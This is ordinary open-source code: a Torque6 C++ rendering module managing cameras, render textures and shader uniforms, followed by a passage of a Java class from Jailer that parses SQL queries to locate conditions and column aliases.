<reponame>RichardRanft/Torque6<filename>src/rendering/rendering.cc //----------------------------------------------------------------------------- // Copyright (c) 2015 <NAME> // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to // deal in the Software without restriction, including without limitation the // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or // sell copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS // IN THE SOFTWARE. //----------------------------------------------------------------------------- #include "rendering.h" #include "console/consoleInternal.h" #include "graphics/dgl.h" #include "graphics/shaders.h" #include "graphics/core.h" #include "scene/scene.h" #include "rendering/transparency.h" #include "renderCamera.h" #include <bgfx/bgfx.h> #include <bx/fpumath.h> #include <bx/timer.h> namespace Rendering { // Canvas (TODO: remove/refactor this) bool windowSizeChanged = false; U32 windowWidth = 0; U32 windowHeight = 0; // Render Data RenderData* renderDataList = NULL; U32 renderDataCount = 0; // Render Cameras, Textures, and Hooks. Vector<RenderCamera*> renderCameraList; Vector<RenderTexture*> renderTextureList; Vector<RenderHook*> renderHookList; void init() { renderDataList = new RenderData[TORQUE_MAX_RENDER_DATA]; } void destroy() { for (S32 n = 0; n < renderTextureList.size(); ++n) { RenderTexture* rt = renderTextureList[n]; if (bgfx::isValid(rt->handle)) bgfx::destroyTexture((rt->handle)); } } void updateWindow(U32 width, U32 height) { windowSizeChanged = (windowWidth != width || windowHeight != height ); windowWidth = width; windowHeight = height; if (windowSizeChanged) { Graphics::reset(); resize(); Scene::refresh(); } } S32 QSORT_CALLBACK compareRenderCameraPriority(const void* a, const void* b) { RenderCamera* cameraA = *((RenderCamera**)a); RenderCamera* cameraB = *((RenderCamera**)b); return cameraA->getRenderPriority() > cameraB->getRenderPriority(); } // Process Frame void render() { // Reset the view table. This clears bgfx view settings and temporary views. Graphics::resetViews(); // We don't continue with rendering until preprocessing is complete (for now) if (Scene::isPreprocessingActive(true)) return; // Render Hooks also get notified about begin/end of frame. for (S32 n = 0; n < renderHookList.size(); ++n) renderHookList[n]->beginFrame(); // Sort Cameras dQsort(renderCameraList.address(), renderCameraList.size(), sizeof(RenderCamera*), compareRenderCameraPriority); // Render each camera. 
for (S32 i = 0; i < renderCameraList.size(); ++i) { RenderCamera* camera = renderCameraList[i]; camera->render(); } // End of frame for (S32 n = 0; n < renderHookList.size(); ++n) renderHookList[n]->endFrame(); } void resize() { } // ---------------------------------------- // Render Data // ---------------------------------------- RenderData* createRenderData() { RenderData* item = NULL; for ( U32 n = 0; n < renderDataCount; ++n ) { if ( renderDataList[n].flags & RenderData::Deleted ) { item = &renderDataList[n]; break; } } if ( item == NULL ) { item = &renderDataList[renderDataCount]; renderDataCount++; } // Reset Values item->flags = 0; item->instances = NULL; item->dynamicIndexBuffer.idx = bgfx::invalidHandle; item->dynamicVertexBuffer.idx = bgfx::invalidHandle; item->indexBuffer.idx = bgfx::invalidHandle; item->vertexBuffer.idx = bgfx::invalidHandle; item->shader.idx = bgfx::invalidHandle; item->material = NULL; item->transformCount = 0; item->transformTable = NULL; item->textures = NULL; item->stateRGBA = 0; item->state = 0 | BGFX_STATE_RGB_WRITE | BGFX_STATE_ALPHA_WRITE | BGFX_STATE_DEPTH_TEST_LESS | BGFX_STATE_DEPTH_WRITE | BGFX_STATE_CULL_CW; return item; } RenderData* getRenderDataList() { return renderDataList; } U32 getRenderDataCount() { return renderDataCount; } // ---------------------------------------- // Utility Functions // ---------------------------------------- Point2I worldToScreen(Point3F worldPos) { RenderCamera* activeCamera = getPriorityRenderCamera(); F32 viewProjMatrix[16]; bx::mtxMul(viewProjMatrix, activeCamera->viewMatrix, activeCamera->projectionMatrix); F32 projectedOutput[3]; F32 projectedInput[3] = {worldPos.x, worldPos.y, worldPos.z}; bx::vec3MulMtxH(projectedOutput, projectedInput, viewProjMatrix); projectedOutput[0] = ((projectedOutput[0] + 1.0f) / 2.0f) * activeCamera->width; projectedOutput[1] = ((1.0f - projectedOutput[1]) / 2.0f) * activeCamera->height; return Point2I((S32)projectedOutput[0], (S32)projectedOutput[1]); } void screenToWorld(Point2I screenPos, Point3F& nearPoint, Point3F& farPoint) { RenderCamera* activeCamera = getPriorityRenderCamera(); F32 invProjMtx[16]; bx::mtxInverse(invProjMtx, activeCamera->projectionMatrix); F32 invViewMtx[16]; bx::mtxInverse(invViewMtx, activeCamera->viewMatrix); F32 x = (2.0f * screenPos.x / Rendering::windowWidth - 1.0f) * -1.0f; F32 y = 2.0f * screenPos.y / Rendering::windowHeight - 1.0f; F32 z = -1.0f; // Near Coord Point4F clipCoordNear(x, y, z, 1.0); Point4F eyeCoordNear; bx::vec4MulMtx(eyeCoordNear, clipCoordNear, invProjMtx); Point4F worldCoordNear; bx::vec4MulMtx(worldCoordNear, eyeCoordNear, invViewMtx); nearPoint.x = worldCoordNear.x / worldCoordNear.w; nearPoint.y = worldCoordNear.y / worldCoordNear.w; nearPoint.z = worldCoordNear.z / worldCoordNear.w; // Far Coord Point4F clipCoordFar(x, y, z, -1.0); Point4F eyeCoordFar; bx::vec4MulMtx(eyeCoordFar, clipCoordFar, invProjMtx); Point4F worldCoordFar; bx::vec4MulMtx(worldCoordFar, eyeCoordFar, invViewMtx); farPoint.x = worldCoordFar.x / worldCoordFar.w; farPoint.y = worldCoordFar.y / worldCoordFar.w; farPoint.z = worldCoordFar.z / worldCoordFar.w; } bool closestPointsOnTwoLines(Point3F& closestPointLine1, Point3F& closestPointLine2, Point3F linePoint1, Point3F lineVec1, Point3F linePoint2, Point3F lineVec2) { closestPointLine1 = Point3F::Zero; closestPointLine2 = Point3F::Zero; float a = mDot(lineVec1, lineVec1); float b = mDot(lineVec1, lineVec2); float e = mDot(lineVec2, lineVec2); float d = a*e - b*b; //lines are not parallel if (d != 0.0f) { 
Point3F r = linePoint1 - linePoint2; float c = mDot(lineVec1, r); float f = mDot(lineVec2, r); float s = (b*f - c*e) / d; float t = (a*f - c*b) / d; closestPointLine1 = linePoint1 + lineVec1 * s; closestPointLine2 = linePoint2 + lineVec2 * t; return true; } else { return false; } } // ---------------------------------------- // Render Camera // ---------------------------------------- RenderCamera* createRenderCamera(StringTableEntry name, StringTableEntry renderingPath) { RenderCamera* camera = getRenderCamera(name); if (camera != NULL) { camera->refCount++; return camera; } camera = new RenderCamera(renderingPath); camera->setName(name); camera->refCount++; camera->registerObject(); renderCameraList.push_back(camera); return camera; } RenderCamera* getRenderCamera(StringTableEntry name) { for (Vector< RenderCamera* >::iterator itr = renderCameraList.begin(); itr != renderCameraList.end(); ++itr) { if ((*itr)->getName() == name) { return (*itr); } } return NULL; } // Return highest priorty render camera. RenderCamera* getPriorityRenderCamera() { if (renderCameraList.size() < 1) return NULL; dQsort(renderCameraList.address(), renderCameraList.size(), sizeof(RenderCamera*), compareRenderCameraPriority); return renderCameraList[renderCameraList.size() - 1]; } bool destroyRenderCamera(RenderCamera* camera) { for (Vector< RenderCamera* >::iterator itr = renderCameraList.begin(); itr != renderCameraList.end(); ++itr) { if ((*itr) == camera) { camera->refCount--; if (camera->refCount < 1) { renderCameraList.erase(itr); camera->deleteObject(); } return true; } } return false; } bool destroyRenderCamera(StringTableEntry name) { for (Vector< RenderCamera* >::iterator itr = renderCameraList.begin(); itr != renderCameraList.end(); ++itr) { if ((*itr)->getName() == name) { Rendering::RenderCamera* camera = (*itr); camera->refCount--; if (camera->refCount < 1) { renderCameraList.erase(itr); camera->deleteObject(); } return true; } } return false; } // ---------------------------------------- // Render Hooks // ---------------------------------------- void addRenderHook(RenderHook* hook) { renderHookList.push_back(hook); } bool removeRenderHook(RenderHook* hook) { for (Vector< RenderHook* >::iterator itr = renderHookList.begin(); itr != renderHookList.end(); ++itr) { if ((*itr) == hook) { renderHookList.erase(itr); return true; } } return false; } Vector<RenderHook*>* getRenderHookList() { return &renderHookList; } // ---------------------------------------- // Render Textures // ---------------------------------------- RenderTexture* createRenderTexture(StringTableEntry name, bgfx::BackbufferRatio::Enum ratio) { RenderTexture* rt = getRenderTexture(name); if (rt != NULL) return rt; const U32 flags = 0 | BGFX_TEXTURE_RT | BGFX_TEXTURE_MIN_POINT | BGFX_TEXTURE_MAG_POINT | BGFX_TEXTURE_MIP_POINT | BGFX_TEXTURE_U_CLAMP | BGFX_TEXTURE_V_CLAMP; rt = new RenderTexture(); rt->name = name; rt->handle = bgfx::createTexture2D(ratio, 1, bgfx::TextureFormat::BGRA8, flags); rt->width = Rendering::windowWidth; rt->height = Rendering::windowHeight; renderTextureList.push_back(rt); return rt; } RenderTexture* createRenderTexture(StringTableEntry name, U32 width, U32 height) { RenderTexture* rt = getRenderTexture(name); if (rt != NULL) return rt; const U32 flags = 0 | BGFX_TEXTURE_RT | BGFX_TEXTURE_MIN_POINT | BGFX_TEXTURE_MAG_POINT | BGFX_TEXTURE_MIP_POINT | BGFX_TEXTURE_U_CLAMP | BGFX_TEXTURE_V_CLAMP; rt = new RenderTexture(); rt->name = name; rt->handle = bgfx::createTexture2D(width, height, 1, 
bgfx::TextureFormat::BGRA8, flags); rt->width = width; rt->height = height; renderTextureList.push_back(rt); return rt; } RenderTexture* getRenderTexture(StringTableEntry name) { for (Vector< RenderTexture* >::iterator itr = renderTextureList.begin(); itr != renderTextureList.end(); ++itr) { if ((*itr)->name == name) { return (*itr); } } return NULL; } bool destroyRenderTexture(StringTableEntry name) { for (Vector< RenderTexture* >::iterator itr = renderTextureList.begin(); itr != renderTextureList.end(); ++itr) { if ((*itr)->name == name) { Rendering::RenderTexture* rt = (*itr); renderTextureList.erase(itr); SAFE_DELETE(rt); return true; } } return false; } // ---------------------------------------- // Uniforms // ---------------------------------------- UniformData::UniformData() { uniform.idx = bgfx::invalidHandle; count = 0; _dataPtr = NULL; } UniformData::UniformData(bgfx::UniformHandle _uniform, U32 _count) { uniform = _uniform; count = _count; _dataPtr = NULL; } UniformData::~UniformData() { // } void UniformData::setValue(F32 value) { _vecValues.set(value, 0.0f, 0.0f, 0.0f); _dataPtr = &_vecValues.x; } void UniformData::setValue(F32* value) { dMemcpy(_matValues, value, sizeof(_matValues)); _dataPtr = &_matValues[0]; } void UniformData::setValue(Point2F value) { _vecValues.set(value.x, value.y, 0.0f, 0.0f); _dataPtr = &_vecValues.x; } void UniformData::setValue(Point3F value) { _vecValues.set(value.x, value.y, value.z, 0.0f); _dataPtr = &_vecValues.x; } void UniformData::setValue(Point4F value) { _vecValues.set(value.x, value.y, value.z, value.w); _dataPtr = &_vecValues.x; } UniformSet::UniformSet() { _selfMade = false; uniforms = NULL; } UniformSet::~UniformSet() { if (_selfMade) { SAFE_DELETE(uniforms); } } void UniformSet::create() { uniforms = new Vector<UniformData>; _selfMade = true; } void UniformSet::clear() { if (!uniforms) return; uniforms->clear(); } bool UniformSet::isEmpty() { if (!uniforms) return true; return uniforms->size() < 1; } UniformData* UniformSet::addUniform() { if (!uniforms) create(); uniforms->push_back(Rendering::UniformData()); return &uniforms->back(); } UniformData* UniformSet::addUniform(const UniformData& uniform) { if (!uniforms) create(); for (S32 i = 0; i < uniforms->size(); i++) { Rendering::UniformData* uni = &uniforms->at(i); if (uni->uniform.idx == uniform.uniform.idx) { uni->_vecValues.set(uniform._vecValues.x, uniform._vecValues.y, uniform._vecValues.z, uniform._vecValues.w); dMemcpy(uni->_matValues, uniform._matValues, sizeof(uni->_matValues)); return uni; } } uniforms->push_back(uniform); return &uniforms->back(); } void UniformSet::addUniformSet(const UniformSet& uniformSet) { for (S32 n = 0; n < uniformSet.uniforms->size(); n++) addUniform(uniformSet.uniforms->at(n)); } }
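// ----------------------------------------
// Usage Sketch
// ----------------------------------------

// Illustrative sketch only, not part of the original module: it shows how the
// projection helpers above can be combined to turn a screen position into a
// world-space pick ray. The function name examplePickRay is hypothetical, and
// it assumes a highest-priority render camera currently exists.
static void examplePickRay(Point2I screenPos, Point3F& rayOrigin, Point3F& rayDirection)
{
   // screenToWorld() yields the near and far points of the ray passing through
   // screenPos for the highest-priority camera.
   Point3F nearPoint, farPoint;
   Rendering::screenToWorld(screenPos, nearPoint, farPoint);

   // The pick ray starts at the near point and heads toward the far point.
   rayOrigin    = nearPoint;
   rayDirection = farPoint - nearPoint;
   rayDirection.normalize();
}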
<filename>src/main/gui/net/sf/jailer/ui/databrowser/whereconditioneditor/WCTypeAnalyser.java /* * Copyright 2007 - 2021 <NAME>. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package net.sf.jailer.ui.databrowser.whereconditioneditor; import java.sql.SQLException; import java.util.ArrayList; import java.util.HashSet; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.Set; import java.util.function.Consumer; import java.util.regex.Matcher; import java.util.regex.Pattern; import java.util.stream.Collectors; import org.apache.log4j.Logger; import net.sf.jailer.datamodel.PrimaryKey; import net.sf.jailer.datamodel.Table; import net.sf.jailer.ui.databrowser.metadata.MDSchema; import net.sf.jailer.ui.databrowser.metadata.MDTable; import net.sf.jailer.ui.databrowser.metadata.MetaDataDetailsPanel; import net.sf.jailer.ui.databrowser.metadata.MetaDataSource; import net.sf.jailer.util.JSqlParserUtil; import net.sf.jailer.util.LogUtil; import net.sf.jailer.util.Pair; import net.sf.jailer.util.Quoting; import net.sf.jailer.util.SqlUtil; import net.sf.jsqlparser.JSQLParserException; import net.sf.jsqlparser.expression.AnalyticExpression; import net.sf.jsqlparser.expression.AnyComparisonExpression; import net.sf.jsqlparser.expression.ArrayConstructor; import net.sf.jsqlparser.expression.ArrayExpression; import net.sf.jsqlparser.expression.CaseExpression; import net.sf.jsqlparser.expression.CastExpression; import net.sf.jsqlparser.expression.CollateExpression; import net.sf.jsqlparser.expression.ConnectByRootOperator; import net.sf.jsqlparser.expression.DateTimeLiteralExpression; import net.sf.jsqlparser.expression.DateValue; import net.sf.jsqlparser.expression.DoubleValue; import net.sf.jsqlparser.expression.Expression; import net.sf.jsqlparser.expression.ExpressionVisitor; import net.sf.jsqlparser.expression.ExtractExpression; import net.sf.jsqlparser.expression.Function; import net.sf.jsqlparser.expression.HexValue; import net.sf.jsqlparser.expression.IntervalExpression; import net.sf.jsqlparser.expression.JdbcNamedParameter; import net.sf.jsqlparser.expression.JdbcParameter; import net.sf.jsqlparser.expression.JsonAggregateFunction; import net.sf.jsqlparser.expression.JsonExpression; import net.sf.jsqlparser.expression.JsonFunction; import net.sf.jsqlparser.expression.KeepExpression; import net.sf.jsqlparser.expression.LongValue; import net.sf.jsqlparser.expression.MySQLGroupConcat; import net.sf.jsqlparser.expression.NextValExpression; import net.sf.jsqlparser.expression.NotExpression; import net.sf.jsqlparser.expression.NullValue; import net.sf.jsqlparser.expression.NumericBind; import net.sf.jsqlparser.expression.OracleHierarchicalExpression; import net.sf.jsqlparser.expression.OracleHint; import net.sf.jsqlparser.expression.OracleNamedFunctionParameter; import net.sf.jsqlparser.expression.Parenthesis; import net.sf.jsqlparser.expression.RowConstructor; import net.sf.jsqlparser.expression.RowGetExpression; import 
net.sf.jsqlparser.expression.SignedExpression; import net.sf.jsqlparser.expression.StringValue; import net.sf.jsqlparser.expression.TimeKeyExpression; import net.sf.jsqlparser.expression.TimeValue; import net.sf.jsqlparser.expression.TimestampValue; import net.sf.jsqlparser.expression.TimezoneExpression; import net.sf.jsqlparser.expression.UserVariable; import net.sf.jsqlparser.expression.ValueListExpression; import net.sf.jsqlparser.expression.VariableAssignment; import net.sf.jsqlparser.expression.WhenClause; import net.sf.jsqlparser.expression.XMLSerializeExpr; import net.sf.jsqlparser.expression.operators.arithmetic.Addition; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseAnd; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseLeftShift; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseOr; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseRightShift; import net.sf.jsqlparser.expression.operators.arithmetic.BitwiseXor; import net.sf.jsqlparser.expression.operators.arithmetic.Concat; import net.sf.jsqlparser.expression.operators.arithmetic.Division; import net.sf.jsqlparser.expression.operators.arithmetic.IntegerDivision; import net.sf.jsqlparser.expression.operators.arithmetic.Modulo; import net.sf.jsqlparser.expression.operators.arithmetic.Multiplication; import net.sf.jsqlparser.expression.operators.arithmetic.Subtraction; import net.sf.jsqlparser.expression.operators.conditional.AndExpression; import net.sf.jsqlparser.expression.operators.conditional.OrExpression; import net.sf.jsqlparser.expression.operators.conditional.XorExpression; import net.sf.jsqlparser.expression.operators.relational.Between; import net.sf.jsqlparser.expression.operators.relational.ComparisonOperator; import net.sf.jsqlparser.expression.operators.relational.EqualsTo; import net.sf.jsqlparser.expression.operators.relational.ExistsExpression; import net.sf.jsqlparser.expression.operators.relational.FullTextSearch; import net.sf.jsqlparser.expression.operators.relational.GreaterThan; import net.sf.jsqlparser.expression.operators.relational.GreaterThanEquals; import net.sf.jsqlparser.expression.operators.relational.InExpression; import net.sf.jsqlparser.expression.operators.relational.IsBooleanExpression; import net.sf.jsqlparser.expression.operators.relational.IsNullExpression; import net.sf.jsqlparser.expression.operators.relational.JsonOperator; import net.sf.jsqlparser.expression.operators.relational.LikeExpression; import net.sf.jsqlparser.expression.operators.relational.Matches; import net.sf.jsqlparser.expression.operators.relational.MinorThan; import net.sf.jsqlparser.expression.operators.relational.MinorThanEquals; import net.sf.jsqlparser.expression.operators.relational.NotEqualsTo; import net.sf.jsqlparser.expression.operators.relational.RegExpMatchOperator; import net.sf.jsqlparser.expression.operators.relational.RegExpMySQLOperator; import net.sf.jsqlparser.expression.operators.relational.SimilarToExpression; import net.sf.jsqlparser.parser.ASTNodeAccess; import net.sf.jsqlparser.parser.SimpleNode; import net.sf.jsqlparser.schema.Column; import net.sf.jsqlparser.statement.Statement; import net.sf.jsqlparser.statement.StatementVisitorAdapter; import net.sf.jsqlparser.statement.select.AllColumns; import net.sf.jsqlparser.statement.select.AllTableColumns; import net.sf.jsqlparser.statement.select.FromItemVisitor; import net.sf.jsqlparser.statement.select.Join; import net.sf.jsqlparser.statement.select.LateralSubSelect; import 
net.sf.jsqlparser.statement.select.OrderByElement; import net.sf.jsqlparser.statement.select.ParenthesisFromItem; import net.sf.jsqlparser.statement.select.PlainSelect; import net.sf.jsqlparser.statement.select.Select; import net.sf.jsqlparser.statement.select.SelectExpressionItem; import net.sf.jsqlparser.statement.select.SelectItem; import net.sf.jsqlparser.statement.select.SelectItemVisitor; import net.sf.jsqlparser.statement.select.SelectVisitor; import net.sf.jsqlparser.statement.select.SelectVisitorAdapter; import net.sf.jsqlparser.statement.select.SetOperationList; import net.sf.jsqlparser.statement.select.SubJoin; import net.sf.jsqlparser.statement.select.SubSelect; import net.sf.jsqlparser.statement.select.TableFunction; import net.sf.jsqlparser.statement.select.ValuesList; import net.sf.jsqlparser.statement.select.WithItem; import net.sf.jsqlparser.statement.values.ValuesStatement; /** * Parses a SQL query and tries to find out the type. * * @author <NAME> */ public class WCTypeAnalyser { /** * The logger. */ private static final Logger logger = Logger.getLogger(MetaDataDetailsPanel.class); public static class Result { public Table table; public String cte; public boolean hasCondition; public boolean isHaving; // having/where public int conditionStart; public int conditionEnd; public String originalQuery; public Set<String> getAlternativeNames(String name) { Set<String> names = alternativeNames.get(name); if (names == null) { names = alternativeNames.get("(" + name + ")"); } return names; } private Map<String, Set<String>> alternativeNames = new LinkedHashMap<String, Set<String>>(); private void addAlternativeName(String name, String alternativeName, Quoting quoting) { Set<String> names = alternativeNames.get(name); if (names == null) { names = new HashSet<String>(); alternativeNames.put(name, names); } names.add(alternativeName); Set<String> finalNames = names; Consumer<String> bracketing = bName -> { if (isValidBracketing(bName)) { finalNames.add(bName.substring(1, bName.length() - 1).trim()); } String bracket = "(" + bName + ")"; if (isValidBracketing(bracket)) { finalNames.add(bracket); } }; bracketing.accept(alternativeName); if (isValidQuoting(alternativeName)) { String unquoted = quoting.unquote(alternativeName); names.add(unquoted); if (!alternativeName.equals(unquoted)) { bracketing.accept(unquoted); } } String quoted = quoting.requote(alternativeName, true); if (isValidQuoting(quoted)) { names.add(quoted); if (!alternativeName.equals(quoted)) { bracketing.accept(quoted); } } } private void addAlternativeName(String name, String altQuantifier, String alternativeName, Quoting quoting) { String uqAltQuantifier = null; String qAltQuantifier = null; if (quoting.isQuoted(altQuantifier) && isValidQuoting(altQuantifier)) { uqAltQuantifier = quoting.unquote(altQuantifier); } String quoted = quoting.requote(altQuantifier, true); if (isValidQuoting(quoted)) { qAltQuantifier = quoted; } uqAltQuantifier = uqAltQuantifier == null? altQuantifier : uqAltQuantifier; qAltQuantifier = qAltQuantifier == null? altQuantifier : qAltQuantifier; String uqAlternativeName = null; String qAlternativeName = null; if (quoting.isQuoted(alternativeName) && isValidQuoting(alternativeName)) { uqAlternativeName = quoting.unquote(alternativeName); } quoted = quoting.requote(alternativeName, true); if (isValidQuoting(quoted)) { qAlternativeName = quoted; } uqAlternativeName = uqAlternativeName == null? alternativeName : uqAlternativeName; qAlternativeName = qAlternativeName == null? 
alternativeName : qAlternativeName; addAlternativeName(name, qAltQuantifier + "." + qAlternativeName, quoting); addAlternativeName(name, uqAltQuantifier + "." + uqAlternativeName, quoting); addAlternativeName(name, uqAltQuantifier + "." + qAlternativeName, quoting); addAlternativeName(name, qAltQuantifier + "." + uqAlternativeName, quoting); } private boolean isValidQuoting(String name) { if (name.length() < 3) { return false; } if (name.charAt(0) != name.charAt(name.length() - 1)) { return false; } String mid = name.substring(1, name.length() - 1); return mid.indexOf(name.charAt(0)) < 0 && mid.indexOf('.') < 0; } private boolean isValidBracketing(String name) { if (!(name.startsWith("(") && name.endsWith(")"))) { return false; } int level = 0; for (int i = 0; i < name.length(); ++i) { char c = name.charAt(i); if (c == '(') { ++level; } else if (c == ')') { --level; if (level < 0) { return false; } } } return level == 0; } public void addAlias(String name, String alias) { Set<String> names = alternativeNames.get(name); if (names == null) { names = new HashSet<String>(); alternativeNames.put(name, names); } names.add(alias); names.add(name); alternativeNames.put(alias, names); } @Override public String toString() { return "Result [table=" + table + ", Columns=" + table.getColumns() + ", hasCondition=" + hasCondition + ", isHaving=" + isHaving + ", conditionStart=" + conditionStart + ", conditionEnd=" + conditionEnd + ", Cond=" + table.getName().substring(conditionStart, conditionEnd) + ", Length=" + table.getName().length() + ", Cte=" + cte + "]"; } } /** * Parses a SQL query and tries to find out the type. * * @param sqlSelect the query * @return the type or <code>null</code> */ public static Result getType(String sqlSelect, MetaDataSource metaDataSource, Quoting quoting) { Result result = new Result(); result.originalQuery = sqlSelect; net.sf.jsqlparser.statement.Statement st; try { StringBuilder woComments = new StringBuilder(SqlUtil.removeComments(sqlSelect)); String woCommentsAndLiterals = SqlUtil.removeCommentsAndLiterals(sqlSelect); String topLevelSql = SqlUtil.removeSubQueries(sqlSelect); StringBuilder cte = new StringBuilder(); st = JSqlParserUtil.parse(woComments.toString(), 2); int[] unknownTableCounter = new int[1]; final LinkedHashMap<String, MDTable> fromClause = analyseFromClause(st, unknownTableCounter, metaDataSource); final List<net.sf.jailer.datamodel.Column> selectClause = new ArrayList<net.sf.jailer.datamodel.Column>(); st.accept(new StatementVisitorAdapter() { private void clearInStatement(Object o) { if (o != null) { Pair<Integer, Integer> pos = null; if (!(o instanceof LikeExpression) && (o instanceof ASTNodeAccess && ((ASTNodeAccess) o).getASTNode() != null)) { SimpleNode node = ((ASTNodeAccess) o).getASTNode(); pos = new Pair<Integer, Integer>(node.jjtGetFirstToken().absoluteBegin - 1, node.jjtGetLastToken().absoluteEnd - 1); } else { String sql = o.toString(); pos = findFragment(sql, woComments.toString()); if (pos == null) { pos = findFragment(sql, woCommentsAndLiterals); } if (pos == null) { pos = findFragment(sql, topLevelSql); } } if (pos != null) { for (int i = pos.a; i < pos.b; ++i) { woComments.setCharAt(i, ' '); } } } } @Override public void visit(Select select) { select.getSelectBody().accept(new SelectVisitor() { @Override public void visit(WithItem withItem) { } @Override public void visit(SetOperationList setOpList) { throw new QueryTooComplexException(); } @Override public void visit(PlainSelect plainSelect) { clearInStatement(plainSelect.getLimit()); 
clearInStatement(plainSelect.getDistinct()); clearInStatement(plainSelect.getTop()); clearInStatement(plainSelect.getFetch()); clearInStatement(plainSelect.getFirst()); clearInStatement(plainSelect.getForUpdateTable()); clearInStatement(plainSelect.getForXmlPath()); clearInStatement(plainSelect.getIntoTables()); clearInStatement(plainSelect.getOffset()); clearInStatement(plainSelect.getKsqlWindow()); clearInStatement(plainSelect.getMySqlHintStraightJoin()); clearInStatement(plainSelect.getMySqlSqlCalcFoundRows()); clearInStatement(plainSelect.getMySqlSqlNoCache()); clearInStatement(plainSelect.getOptimizeFor()); clearInStatement(plainSelect.getOracleHierarchical()); clearInStatement(plainSelect.getOracleHint()); clearInStatement(plainSelect.getSkip()); clearInStatement(plainSelect.getWait()); List<OrderByElement> orderByElements = plainSelect.getOrderByElements(); if (orderByElements != null) { clearInStatement("order by " + orderByElements.stream().map(e -> e.toString()).collect(Collectors.joining(", "))); } Expression cond = null; if (plainSelect.getGroupBy() != null) { result.isHaving = true; cond = plainSelect.getHaving(); } else { result.isHaving = false; cond = plainSelect.getWhere(); } if (cond != null) { result.hasCondition = true; Pair<Integer, Integer> pos = null; if (!(cond instanceof LikeExpression) && (cond instanceof ASTNodeAccess && ((ASTNodeAccess) cond).getASTNode() != null)) { SimpleNode node = ((ASTNodeAccess) cond).getASTNode(); pos = new Pair<Integer, Integer>(node.jjtGetFirstToken().absoluteBegin - 1, node.jjtGetLastToken().absoluteEnd - 1); } else { String sql = cond.toString(); pos = findFragment(sql, woComments.toString()); if (pos == null) { pos = findFragment(sql, woCommentsAndLiterals); } if (pos == null) { pos = findFragment(sql, topLevelSql); } if (pos == null) { pos = findFragment((result.isHaving? "having " : "where ") + sql, topLevelSql); if (pos == null) { pos = findFragment((result.isHaving? "having " : "where ") + sql, woComments.toString()); } if (pos != null) { Pattern p = Pattern.compile("^(" + (result.isHaving? "having" : "where") + "\\s+)", Pattern.CASE_INSENSITIVE); Matcher matcher = p.matcher(topLevelSql.substring(pos.a, pos.b)); if (matcher.find()) { pos = new Pair<Integer, Integer>(pos.a + matcher.end(), pos.b); } else { pos = null; } } } } if (pos != null) { result.conditionStart = pos.a; result.conditionEnd = pos.b; } else { if (!warned) { LogUtil.warn(new RuntimeException("Cond. 
not found: " + cond + ":" + (woComments.toString().replaceAll("\\s+", " ")))); warned = true; } throw new QueryTooComplexException(); } } else { result.hasCondition = false; } int selectEnd = plainSelect.getSelectItems().get(plainSelect.getSelectItems().size() - 1).getASTNode().jjtGetLastToken().absoluteEnd - 1; int plainSelectStart = plainSelect.getASTNode().jjtGetFirstToken().absoluteBegin - 1; cte.append(woComments.toString().substring(0, plainSelectStart)); for (int i = 0; i < selectEnd; ++i) { woComments.setCharAt(i, ' '); } woComments.setCharAt(selectEnd - 1, '\f'); Pair<Integer, Integer> pos = findFragment("\f from", woComments.toString()); if (pos != null) { for (int i = pos.a; i < pos.b; ++i) { woComments.setCharAt(i, ' '); } } else { throw new QueryTooComplexException(); } for (SelectItem si: plainSelect.getSelectItems()) { si.accept(new SelectItemVisitor() { @Override public void visit(SelectExpressionItem selectExpressionItem) { try { int a = selectExpressionItem.getASTNode().jjtGetFirstToken().absoluteBegin - 1; int b = selectExpressionItem.getASTNode().jjtGetLastToken().absoluteEnd - 1; String sql = sqlSelect.substring(a, b); if (selectExpressionItem.getAlias() != null) { sql = sql.replaceAll("\\s*" + (selectExpressionItem.getAlias().isUseAs()? "as\\s+" : "") + Pattern.quote(selectExpressionItem.getAlias().getName()) + "\\s*$", ""); } boolean[] noSubexpression = new boolean[] { true }; final Column column[] = new Column[1]; selectExpressionItem.getExpression().accept(createExpressionVisitor(noSubexpression, column)); boolean isNullable = true; if (column[0] != null) { String alias = null; if (column[0].getTable() != null) { if (column[0].getTable().getAlias() != null) { alias = column[0].getTable().getAlias().getName(); } else { alias = column[0].getTable().getName(); } } if (noSubexpression[0]) { net.sf.jailer.datamodel.Column col; try { col = findColumn(alias, column[0].getColumnName(), fromClause, metaDataSource); if (col != null) { isNullable = col.isNullable; } } catch (SQLException e) { // ignore } if (unknownTableCounter[0] == 0) { String uniqueColumnAlias = findUniqueAliasOfTableColumn(column[0].getColumnName(), fromClause); if (uniqueColumnAlias != null) { if (column[0].getTable() != null) { if (idEquals(column[0].getTable().getFullyQualifiedName(), uniqueColumnAlias, false)) { result.addAlternativeName(sql, column[0].getColumnName(), quoting); } } else { result.addAlternativeName(sql, uniqueColumnAlias, column[0].getColumnName(), quoting); } } } } } net.sf.jailer.datamodel.Column col = new net.sf.jailer.datamodel.Column(sql, null, -1, -1); col.isNullable = isNullable; selectClause.add(col); } catch (Exception e) { LogUtil.warn(e); throw new QueryTooComplexException(); } } @Override public void visit(AllTableColumns allTableColumns) { String tableName = allTableColumns.getTable().getName(); String tableAlias = null; if 